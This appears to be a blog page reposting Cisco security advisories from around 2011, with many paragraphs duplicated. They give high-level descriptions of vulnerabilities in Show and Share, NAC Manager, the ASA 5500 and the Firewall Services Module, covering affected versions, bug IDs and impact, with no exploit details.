The Cisco Show and Share webcasting and video sharing application contains two vulnerabilities.
The Cisco Show and Share webcasting and video sharing application contains two vulnerabilities.
- The first vulnerability allows an unauthenticated user to access several administrative web pages.
- The second vulnerability permits an authenticated user to execute arbitrary code on the device under the privileges of the web server user account.
Vulnerable Products
These vulnerabilities affect all versions of Cisco Show and Share prior to the first fixed releases as indicated in the Software Version and Fixes section of this Cisco Security Advisory.
These vulnerabilities affect all versions of Cisco Show and Share prior to the first fixed releases as indicated in the Software Version and Fixes section of this Cisco Security Advisory.
Details
Cisco Show and Share contains the following vulnerabilities:
Cisco Show and Share contains the following vulnerabilities:
- Anonymous users can access some administration pages: Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. These include pages for accessing Encoders and Pull Configurations, Push Configurations, Video Encoding Formats, and Transcoding. This vulnerability is documented in Cisco Bug ID CSCto73758, (registered customers only) and has been assigned CVE identifier CVE-2011-2584.
- Cisco Show and Share arbitrary code execution vulnerability: An authenticated user with privileges to upload videos could upload code that could then be executed under the privileges of the web server.
Impact
These vulnerabilities have the following impact on Cisco Show and Share:
CSCto73758: Anonymous users can access some administration pages. Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. The impact of the different administrative web pages include:
These vulnerabilities have the following impact on Cisco Show and Share:
CSCto73758: Anonymous users can access some administration pages. Several administrative web pages of the Cisco Show and Share can be accessed without prior user authentication. The impact of the different administrative web pages include:
- Encoders Configurations
- Push Configurations
- Video Encoding Formats
- Transcoding
CSCto69857: Cisco Show and Share arbitrary code execution vulnerability. An authenticated user may upload arbitrary code that can be executed on the appliance with the same privileges as the web server.
Directory Traversal Vulnerability in Cisco Network Admission Control Manager
Cisco Network Admission Control (NAC) Manager contains a directory traversal vulnerability that may allow an unauthenticated attacker to obtain system information.
Cisco Network Admission Control (NAC) Manager contains a directory traversal vulnerability that may allow an unauthenticated attacker to obtain system information.
Vulnerable Products
Only Cisco NAC Manager software versions 4.8.X are affected by this vulnerability. Cisco NAC Manager software versions 4.7.X and earlier are not affected.
Only Cisco NAC Manager software versions 4.8.X are affected by this vulnerability. Cisco NAC Manager software versions 4.7.X and earlier are not affected.
Details
Cisco NAC Manager contains a directory traversal vulnerability. The management interface uses TCP port 443. An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
Cisco NAC Manager contains a directory traversal vulnerability. The management interface uses TCP port 443. An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
Impact
An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
An unauthenticated attacker could exploit this vulnerability to access sensitive information, including password files and system logs, that could be leveraged to launch subsequent attacks.
Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module are affected by multiple vulnerabilities as follows:
Cisco ASA 5500 Series Adaptive Security Appliances and Cisco Catalyst 6500 Series ASA Services Module are affected by multiple vulnerabilities as follows:
- MSN Instant Messenger (IM) Inspection Denial of Service vulnerability
- TACACS+ Authentication Bypass vulnerability
- Four SunRPC Inspection Denial of Service vulnerabilities
- Internet Locator Service (ILS) Inspection Denial of Service vulnerability
Vulnerable Products
- MSN IM Inspection Denial of Service Vulnerability: The MSN IM inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances is affected by a DoS vulnerability.
- TACACS+ Authentication Bypass Vulnerability: An authentication bypass vulnerability affects the TACACS+ implementation of Cisco ASA 5500 Series Adaptive Security Appliances.
- SunRPC Inspection Denial of Service Vulnerabilities: Four DoS vulnerabilities affect the SunRPC inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances.
- ILS Inspection Denial of Service Vulnerability: A DoS vulnerability affects the ILS inspection feature of Cisco ASA 5500 Series Adaptive Security Appliances.
Impact
Successful exploitation of all the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall and/or administrative sessions.
Successful exploitation of all the DoS vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained DoS condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall and/or administrative sessions.
Multiple Vulnerabilities in Cisco Firewall Services Module
The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by the following vulnerabilities:
The Cisco Firewall Services Module (FWSM) for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by the following vulnerabilities:
- Syslog Message Memory Corruption Denial of Service Vulnerability
- Authentication Proxy Denial of Service Vulnerability
- TACACS+ Authentication Bypass Vulnerability
- Sun Remote Procedure Call (SunRPC) Inspection Denial of Service Vulnerabilities
- Internet Locator Server (ILS) Inspection Denial of Service Vulnerability
Vulnerable Products
The Cisco FWSM for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by multiple vulnerabilities. Affected versions of Cisco FWSM Software vary depending on the specific vulnerability. Refer to the “Software Version and Fixes” section for specific information on vulnerable versions.
The Cisco FWSM for the Cisco Catalyst 6500 Series switches and Cisco 7600 Series routers is affected by multiple vulnerabilities. Affected versions of Cisco FWSM Software vary depending on the specific vulnerability. Refer to the “Software Version and Fixes” section for specific information on vulnerable versions.
Details
- Syslog Message Memory Corruption Denial of Service Vulnerability: A denial of service vulnerability exists in the implementation of one specific system log message (message ID 302015, “Built outbound UDP connection session-id for src-intf:IP/Port to dst-intf:IP/Port ARP-Incomplete”) that can cause memory corruption and lead to a lock up or crash of the Cisco FWSM in the event that that system log message needs to be generated for IPv6 traffic that has flowed through the device. The Cisco FWSM may not recover on its own and a manual reboot may be necessary to recover.
- Authentication Proxy Denial of Service Vulnerability: A denial of service vulnerability exists in some versions of Cisco FWSM Software that affects devices configured to use authentication to grant users access to the network, also known as cut-through or authentication proxy. Vulnerable configurations are those that contain the aaa authentication match or aaa authentication include commands. The vulnerability may be triggered when there is a high number of network access authentication requests.
- TACACS+ Authentication Bypass Vulnerability: An authentication bypass vulnerability exists in the TACACS+ implementation in the Cisco FWSM. Successful exploitation could allow a remote attacker to bypass TACACS+ authentication of VPN users (the Cisco FWSM only allows VPN sessions for management), firewall sessions, or administrative access to the device.
- SunRPC Inspection Denial of Service Vulnerabilities: The Cisco FWSM is affected by four vulnerabilities that may cause the device to reload during the processing of different crafted SunRPC messages when SunRPC inspection is enabled. These vulnerabilities are triggered only by transit traffic; traffic that is destined to the device does not trigger these vulnerabilities.
- ILS Inspection Denial of Service Vulnerability: The ILS inspection engine provides Network Address Translation (NAT) support for Microsoft NetMeeting, SiteServer, and Active Directory products that use Lightweight Directory Access Protocol (LDAP) to exchange directory information with an ILS server.
Impact
Successful exploitation of any of the denial of service vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained denial of service condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall, and/or administrative sessions
Successful exploitation of any of the denial of service vulnerabilities could cause an affected device to reload. Repeated exploitation could result in a sustained denial of service condition. Successful exploitation of the TACACS+ authentication bypass vulnerability could allow an attacker to bypass authentication of VPN, firewall, and/or administrative sessions
Subscribe to:
Posts (Atom)